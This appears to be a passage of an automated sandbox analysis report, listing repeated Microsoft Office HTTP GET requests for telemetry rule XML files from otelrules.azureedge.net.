Source: global traffic	HTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703901v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703351v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703350v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703501v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703500v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701800v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701801v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703401v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703400v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700501v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700500v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
